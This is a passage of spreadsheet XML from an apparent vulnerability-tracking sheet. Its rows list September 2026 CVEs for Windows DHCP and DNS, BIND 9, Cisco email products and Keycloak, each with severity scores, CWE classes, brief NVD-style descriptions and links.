        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K615" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr"/>
      <c r="Q615" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76163</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr"/>
      <c r="Q616" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>If BIND is loaded with a "`named.conf`" file that contains no global "`options`" block, an attacker can send a query of QTYPE TKEY which may cause an assertion failure and subsequent unexpected program exit.
This issue affects BIND 9 versions 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76163</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76442</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr"/>
      <c r="Q617" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Email Gateway and Cisco Secure Email and Web Manager engineering team has conducted a comprehensive internal security review. This review resulted in software hardening releases that address multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-76442 are related to issues with improper validation of specified quantity in input that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-1284.</t>
        </is>
      </c>
      <c r="S617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76442</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr"/>
      <c r="Q618" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr"/>
      <c r="Q619" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr"/>
      <c r="Q620" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr"/>
      <c r="Q621" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr"/>
      <c r="Q622" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77692</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr"/>
      <c r="Q623" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>An attacker can cause `named` to abort by sending a crafted DNS-over-HTTPS request with a cryptographically invalid SIG(0) record, and then closing the transport connection prematurely.
This issue affects BIND 9 versions 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77692</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K624" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr"/>
      <c r="Q624" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K625" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr"/>
      <c r="Q625" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr"/>
      <c r="Q626" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr"/>
      <c r="Q627" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr"/>
      <c r="Q628" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr"/>
      <c r="Q629" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79651</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr"/>
      <c r="Q630" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the theme localization endpoints of the keycloak-services component, which is the core service responsible for authentication flows and theme management in Keycloak. The issue occurs because the system accepts arbitrary locale tags from unauthenticated requests and stores them in a permanent in-memory cache without limits. An attacker can exploit this by sending a large number of unique locale tags, eventually causing the server to run out of memory and crash.</t>
        </is>
      </c>
      <c r="S630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79651</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80274</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
